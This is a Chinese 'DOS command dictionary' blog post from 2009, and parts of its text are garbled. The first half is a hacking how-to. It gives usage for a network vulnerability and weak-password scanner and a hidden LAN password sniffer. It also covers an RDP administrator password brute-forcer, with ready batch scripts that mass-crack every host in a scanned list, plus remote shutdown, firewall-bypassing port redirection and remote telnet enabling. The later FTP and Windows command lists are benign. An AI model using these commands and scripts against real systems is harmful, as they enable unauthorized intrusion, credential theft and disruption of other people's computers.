DOS命令字典2
電腦技術(shù) 2009-02-20 09:21:42 閱讀2 評論 字號(hào):大中小 訂閱
2�、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項(xiàng)目> [其他選項(xiàng)] 掃錨"起始IP到終止IP"段的所有主機(jī)信息
xscan -file <主機(jī)列表文件名> <檢測項(xiàng)目> [其他選項(xiàng)] 掃錨"主機(jī)IP列表文件名"中的所有主機(jī)信息
檢測項(xiàng)目
-active 檢測主機(jī)是否存活
-os 檢測遠(yuǎn)程操作系統(tǒng)類型(通過NETBIOS和SNMP協(xié)議)
-port 檢測常用服務(wù)的端口狀態(tài)
-ftp 檢測FTP弱口令
-pub 檢測FTP服務(wù)匿名用戶寫權(quán)限
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 加載Nessus攻擊腳本
-all 檢測以上所有項(xiàng)目
其它選項(xiàng)
-i 適配器編號(hào) 設(shè)置網(wǎng)絡(luò)適配器, <適配器編號(hào)>可通過"-l"參數(shù)獲取
-l 顯示所有網(wǎng)絡(luò)適配器
-v 顯示詳細(xì)掃描進(jìn)度
-p 跳過沒有響應(yīng)的主機(jī)
-o 跳過沒有檢測到開放端口的主機(jī)
-t 并發(fā)線程數(shù)量,并發(fā)主機(jī)數(shù)量 指定最大并發(fā)線程數(shù)量和并發(fā)主機(jī)數(shù)量, 默認(rèn)數(shù)量為100,10
-log 文件名 指定掃描報(bào)告文件名 (后綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機(jī)的所有漏洞,跳過無響應(yīng)的主機(jī)
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機(jī)的標(biāo)準(zhǔn)端口狀態(tài)���,NT弱口令用戶���,最大并發(fā)線程數(shù)量為150,跳過沒有檢測到開放端口的主機(jī)
xscan -file hostlist.*t -port -cgi -t 200,5 -v -o 檢測“hostlist.*t”文件中列出的所有主機(jī)的標(biāo)準(zhǔn)端口狀態(tài)����,CGI漏洞,最大并發(fā)線程數(shù)量為200��,同一時(shí)刻最多檢測5臺(tái)主機(jī)�����,顯示詳細(xì)檢測進(jìn)度���,跳過沒有檢測到開放端口的主機(jī)www.jz5u.com
【9】
3�、命令行方式嗅探器: xsniff.exe
可捕獲局域網(wǎng)內(nèi)FTP/SMTP/POP3/HTTP協(xié)議密碼
參數(shù)說明
-tcp 輸出TCP數(shù)據(jù)報(bào)
-udp 輸出UDP數(shù)據(jù)報(bào)
-icmp 輸出ICMP數(shù)據(jù)報(bào)
-pass 過濾密碼信息
-hide 后臺(tái)運(yùn)行
-host 解析主機(jī)名
-addr IP地址 過濾IP地址
-port 端口 過濾端口
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進(jìn)制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 后臺(tái)運(yùn)行嗅探密碼并將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過濾tcp和udp信息并以ASCII格式輸出
4���、終端服務(wù)密碼破解: tscrack.exe
參數(shù)說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯(cuò)誤時(shí)發(fā)出的聲音
-t 同是發(fā)出多個(gè)連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f后面的密碼
-F 間隔時(shí)間(頻率)
-l 使用-l后面的用戶名
-w 使用-w后面的密碼字典
-p 使用-p后面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l ***istrator -w pass.dic 遠(yuǎn)程用密碼字典文件暴破主機(jī)的***istrator的登陸密碼
tscrack 192.168.0.1 -l ***istrator -p 123456 用密碼123456遠(yuǎn)程登陸192.168.0.1的***istrator用戶
@if not exist ipcscan.*t goto noscan
@for /f "tokens=1 delims= " %%i in (3389.*t) do call hack.bat %%i
nscan
@echo 3389.*t no find or scan faild
(①存為3389.bat) (假設(shè)現(xiàn)有用SuperScan或其它掃錨器掃到一批開有3389的主機(jī)IP列表文件3389.*t)
3389.bat意思是:從3389.*t文件中取一個(gè)IP����,接著運(yùn)行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l ***istrator -w pass.dic >>rouji.*t
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運(yùn)行3389.bat就OK����,且3389.bat、hack.bat���、3389.*t�、pass.dic與tscrack.exe在同一個(gè)目錄下�;就可以等待結(jié)果了)
hack.bat意思是:運(yùn)行tscrack.exe用字典暴破3389.*t中所有主機(jī)的***istrator密碼,并將破解結(jié)果保存在rouji.*t文件中���。
5���、其它:
Shutdown.exe
Shutdown \\IP地址 t:20 20秒后將對方NT自動(dòng)關(guān)閉(Windows 2003系統(tǒng)自帶工具,在Windows2000下用進(jìn)就得下載此工具才能用����。在前面Windows 2003 DOS命令中有詳細(xì)介紹。)
fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細(xì)說明(端口重定向繞過防火墻)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當(dāng)有人掃錨你的80端口時(shí)���,他掃到的結(jié)果會(huì)完全是www.sina.com.cn的主機(jī)信息
Fpipe -l 23 -s 88 -r 23 目標(biāo)IP 把本機(jī)向目標(biāo)IP發(fā)送的23端口Telnet請求經(jīng)端口重定向后���,就通過88端口發(fā)送到目標(biāo)IP的23端口�����。(與目標(biāo)IP建立Telnet時(shí)本機(jī)就用的88端口與其相連接)然后:直接Telnet 127.0.0.1(本機(jī)IP)就連接到目標(biāo)IP的23端口了���。
OpenTelnet.exe (遠(yuǎn)程開啟telnet工具)
opentelnet.exe \\IP 賬號(hào) 密碼 ntlm認(rèn)證方式 Telnet端口 (不需要上傳ntlm.exe破壞微軟的身份驗(yàn)證方式)直接遠(yuǎn)程開啟對方的telnet服務(wù)后,就可用telnet \\ip 連接上對方���。
NTLM認(rèn)證方式:0:不使用NTLM身份驗(yàn)證���;1:先嘗試NTLM身份驗(yàn)證,如果失敗����,再使用用戶名和密碼;2:只使用NTLM身份驗(yàn)證�����。
ResumeTelnet.exe (OpenTelnet附帶的另一個(gè)工具)
resumetelnet.exe \\IP 賬號(hào) 密碼 用Telnet連接完對方后����,就用這個(gè)命令將對方的Telnet設(shè)置還原����,并同時(shí)關(guān)閉Telnet服務(wù)�。
【10】
6���、FTP命令詳解:
FTP命令是Internet用戶使用最頻繁的命令之一�,熟悉并靈活應(yīng)用FTP的內(nèi)部命令�,可以大大方便使用者,并收到事半功倍之效�����。如果你想學(xué)習(xí)使用進(jìn)行后臺(tái)FTP下載�����,那么就必須學(xué)習(xí)FTP指令��。
FTP的命令行格式為:
ftp -v -d -i -n -g [主機(jī)名] �,其中
-v 顯示遠(yuǎn)程服務(wù)器的所有響應(yīng)信息;
-n 限制ftp的自動(dòng)登錄�,即不使用;.n etrc文件����;
-d 使用調(diào)試方式���;
-g 取消全局文件名。
FTP使用的內(nèi)部命令如下(中括號(hào)表示可選項(xiàng)):
1.![cmd[args]]:在本地機(jī)中執(zhí)行交互shell���,exit回到ftp環(huán)境����,如:!ls*.zip
2.$ macro-ame[args]: 執(zhí)行宏定義macro-name����。
3.account[password]: 提供登錄遠(yuǎn)程系統(tǒng)成功后訪問系統(tǒng)資源所需的補(bǔ)充口令。
4.append local-file[remote-file]:將本地文件追加到遠(yuǎn)程系統(tǒng)主機(jī)����,若未指定遠(yuǎn)程系統(tǒng)文件名,則使用本地文件名����。
5.ascii:使用ascii類型傳輸方式。
6.bell:每個(gè)命令執(zhí)行完畢后計(jì)算機(jī)響鈴一次���。
7.bin:使用二進(jìn)制文件傳輸方式���。
8.bye:退出ftp會(huì)話過程�����。
9.case:在使用mget時(shí)�,將遠(yuǎn)程主機(jī)文件名中的大寫轉(zhuǎn)為小寫字母���。
10.cd remote-dir:進(jìn)入遠(yuǎn)程主機(jī)目錄。
11.cdup:進(jìn)入遠(yuǎn)程主機(jī)目錄的父目錄����。
12.chmod mode file-name:將遠(yuǎn)程主機(jī)文件file-name的存取方式設(shè)置為mode,如:chmod 777 a.out�����。
13.close:中斷與遠(yuǎn)程服務(wù)器的ftp會(huì)話(與open對應(yīng))�。
14.cr:使用asscii方式傳輸文件時(shí),將回車換行轉(zhuǎn)換為回行�����。
15.delete remote-file:刪除遠(yuǎn)程主機(jī)文件���。
16.debug[debug-value]:設(shè)置調(diào)試方式�����, 顯示發(fā)送至遠(yuǎn)程主機(jī)的每條命令���,如:deb up 3��,若設(shè)為0��,表示取消debug��。
17.dir[remote-dir][local-file]:顯示遠(yuǎn)程主機(jī)目錄��,并將結(jié)果存入本地文件���。
18.disconnection:同close。
19.form format:將文件傳輸方式設(shè)置為format�,缺省為file方式。
20.get remote-file[local-file]: 將遠(yuǎn)程主機(jī)的文件remote-file傳至本地硬盤的local-file��。
21.glob:設(shè)置mdelete����,mget��,mput的文件名擴(kuò)展���,缺省時(shí)不擴(kuò)展文件名,同命令行的-g參數(shù)�。
22.hash:每傳輸1024字節(jié),顯示一個(gè)hash符號(hào)(#)。
23.help[cmd]:顯示ftp內(nèi)部命令cmd的幫助信息,如:help get���。
24.idle[seconds]:將遠(yuǎn)程服務(wù)器的休眠計(jì)時(shí)器設(shè)為[seconds]秒��。
25.image:設(shè)置二進(jìn)制傳輸方式(同binary)�����。
26.lcd[dir]:將本地工作目錄切換至dir���。
27.ls[remote-dir][local-file]:顯示遠(yuǎn)程目錄remote-dir, 并存入本地文件local-file�����。
28.macdef macro-name:定義一個(gè)宏,遇到macdef下的空行時(shí)�,宏定義結(jié)束。
29.mdelete[remote-file]:刪除遠(yuǎn)程主機(jī)文件�。
30.mdir remote-files local-file:與dir類似,但可指定多個(gè)遠(yuǎn)程文件���,如 :mdir *.o.*.zipoutfile ����。
31.mget remote-files:傳輸多個(gè)遠(yuǎn)程文件���。
32.mkdir dir-name:在遠(yuǎn)程主機(jī)中建一目錄���。
33.mls remote-file local-file:同nlist,但可指定多個(gè)文件名����。
34.mode[modename]:將文件傳輸方式設(shè)置為modename, 缺省為stream方式���。
35.modtime file-name:顯示遠(yuǎn)程主機(jī)文件的最后修改時(shí)間�����。
36.mput local-file:將多個(gè)文件傳輸至遠(yuǎn)程主機(jī)��。
37.newer file-name: 如果遠(yuǎn)程機(jī)中file-name的修改時(shí)間比本地硬盤同名文件的時(shí)間更近�,則重傳該文件。
38.nlist[remote-dir][local-file]:顯示遠(yuǎn)程主機(jī)目錄的文件清單���,并存入本地硬盤的local-file���。
39.nmap[inpattern outpattern]:設(shè)置文件名映射機(jī)制, 使得文件傳輸時(shí)��,文件中的某些字符相互轉(zhuǎn)換�, 如:nmap $1.$2.$3[$1,$2].[$2��,$3]����,則傳輸文件a1.a2.a3時(shí)���,文件名變?yōu)閍1���,a2。 該命令特別適用于遠(yuǎn)程主機(jī)為非UNIX機(jī)的情況。
40.ntrans[inchars[outchars]]:設(shè)置文件名字符的翻譯機(jī)制��,如ntrans1R�����,則文件名LLL將變?yōu)镽RR���。
41.open host[port]:建立指定ftp服務(wù)器連接����,可指定連接端口����。
42.passive:進(jìn)入被動(dòng)傳輸方式。
43.prompt:設(shè)置多個(gè)文件傳輸時(shí)的交互提示����。
44.proxy ftp-cmd:在次要控制連接中,執(zhí)行一條ftp命令��, 該命令允許連接兩個(gè)ftp服務(wù)器�����,以在兩個(gè)服務(wù)器間傳輸文件。第一條ftp命令必須為open���,以首先建立兩個(gè)服務(wù)器間的連接����。
45.put local-file[remote-file]:將本地文件local-file傳送至遠(yuǎn)程主機(jī)�����。
46.pwd:顯示遠(yuǎn)程主機(jī)的當(dāng)前工作目錄���。
47.quit:同bye����,退出ftp會(huì)話��。
48.quote arg1����,arg2...:將參數(shù)逐字發(fā)至遠(yuǎn)程ftp服務(wù)器���,如:quote syst.
49.recv remote-file[local-file]:同get�。
50.reget remote-file[local-file]:類似于get, 但若local-file存在����,則從上次傳輸中斷處續(xù)傳。
51.rhelp[cmd-name]:請求獲得遠(yuǎn)程主機(jī)的幫助�����。
52.rstatus[file-name]:若未指定文件名����,則顯示遠(yuǎn)程主機(jī)的狀態(tài), 否則顯示文件狀態(tài)���。
53.rename[from][to]:更改遠(yuǎn)程主機(jī)文件名���。
54.reset:清除回答隊(duì)列。
55.restart marker:從指定的標(biāo)志marker處����,重新開始get或put,如:restart 130�。
56.rmdir dir-name:刪除遠(yuǎn)程主機(jī)目錄。
57.runique:設(shè)置文件名只一性存儲(chǔ)�,若文件存在���,則在原文件后加后綴.1, .2等���。
58.send local-file[remote-file]:同put����。
59.sendport:設(shè)置PORT命令的使用����。
60.site arg1,arg2...:將參數(shù)作為SITE命令逐字發(fā)送至遠(yuǎn)程ftp主機(jī)���。
61.size file-name:顯示遠(yuǎn)程主機(jī)文件大小��,如:site idle 7200�����。
62.status:顯示當(dāng)前ftp狀態(tài)���。www.jz5u.com
63.struct[struct-name]:將文件傳輸結(jié)構(gòu)設(shè)置為struct-name, 缺省時(shí)使用stream結(jié)構(gòu)���。
64.sunique:將遠(yuǎn)程主機(jī)文件名存儲(chǔ)設(shè)置為只一(與runique對應(yīng))����。
65.system:顯示遠(yuǎn)程主機(jī)的操作系統(tǒng)類型�����。
66.tenex:將文件傳輸類型設(shè)置為TENEX機(jī)的所需的類型���。
67.tick:設(shè)置傳輸時(shí)的字節(jié)計(jì)數(shù)器����。
68.trace:設(shè)置包跟蹤���。
69.type[type-name]:設(shè)置文件傳輸類型為type-name�,缺省為ascii���,如:type binary�,設(shè)置二進(jìn)制傳輸方式����。
70.umask[newmask]:將遠(yuǎn)程服務(wù)器的缺省umask設(shè)置為newmask��,如:umask 3
71.user user-name[password][account]:向遠(yuǎn)程主機(jī)表明自己的身份����,需要口令時(shí)�����,必須輸入口令�����,如:user anonymous my@email����。
72.verbose:同命令行的-v參數(shù),即設(shè)置詳盡報(bào)告方式����,ftp 服務(wù)器的所有響 應(yīng)都將顯示給用戶,缺省為on.
73.?[cmd]:同help.
【11】
7:計(jì)算機(jī)運(yùn)行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結(jié)構(gòu)
wupdmgr--------windows更新程序
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結(jié)構(gòu)
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設(shè)置
write----------寫字板winmsd-----系統(tǒng)信息
wiaacmgr-------掃描儀和照相機(jī)向?qū)?
winchat--------XP自帶局域網(wǎng)聊天
mem.exe--------顯示內(nèi)存使用情況
Msconfig.exe---系統(tǒng)配置實(shí)用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠(yuǎn)程桌面連接
mplayer2-------媒體播放機(jī)
magnify--------放大鏡實(shí)用程序
mmc------------打開控制臺(tái)
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統(tǒng)醫(yī)生
devmgmt.msc--- 設(shè)備管理器
dfrg.msc-------磁盤碎片整理程序
diskmgmt.msc---磁盤管理實(shí)用程序
dcomcnfg-------打開系統(tǒng)組件服務(wù)
ddeshare-------打開DDE共享設(shè)置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務(wù)
net start messenger----開始信使服務(wù)
notepad--------打開記事本
nslookup-------網(wǎng)絡(luò)管理的工具向?qū)?
ntbackup-------系統(tǒng)備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動(dòng)存儲(chǔ)管理器
ntmsoprq.msc---移動(dòng)存儲(chǔ)管理員操作請求
netstat -an----(TC)命令檢查接口
syncapp--------創(chuàng)建一個(gè)公文包
sysedit--------系統(tǒng)配置編輯器
sigverif-------文件簽名驗(yàn)證程序
sndrec32-------錄音機(jī)
shrpubw--------創(chuàng)建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統(tǒng)加密����,一旦加密就不能解開,保護(hù)windows xp系統(tǒng)的雙重密碼
services.msc---本地服務(wù)設(shè)置
Sndvol32-------音量控制程序
sfc.exe--------系統(tǒng)文件檢查器
sfc /scannow---windows文件保護(hù)
tsshutdn-------60秒倒計(jì)時(shí)關(guān)機(jī)命令
tourstart------xp簡介(安裝完成后出現(xiàn)的漫游xp程序)
taskmgr--------任務(wù)管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
packager-------對象包裝程序
perfmon.msc----計(jì)算機(jī)性能監(jiān)測程序
progman--------程序管理器
regedit.exe----注冊表
rsop.msc-------組策略結(jié)果集
regedt32-------注冊表編輯器
rononce -p ----15秒關(guān)機(jī)
regsvr32 /u *.dll----停止dll文件運(yùn)行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盤檢查
certmgr.msc----證書管理實(shí)用程序
calc-----------啟動(dòng)計(jì)算器
charmap--------啟動(dòng)字符映射表
cliconfg-------SQL SERVER 客戶端網(wǎng)絡(luò)實(shí)用程序
Clipbrd--------剪貼板查看器
conf-----------啟動(dòng)netmeeting
compmgmt.msc---計(jì)算機(jī)管理
cleanmgr-------**整理
ciadv.msc------索引服務(wù)程序
osk------------打開屏幕鍵盤
odbcad32-------ODBC數(shù)據(jù)源管理器
oobe/msoobe /a----檢查XP是否激活
lusrmgr.msc----本機(jī)用戶和組
logoff---------注銷命令
iexpress-------木馬捆綁工具,系統(tǒng)自帶
Nslookup-------IP地址偵測器
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略
|
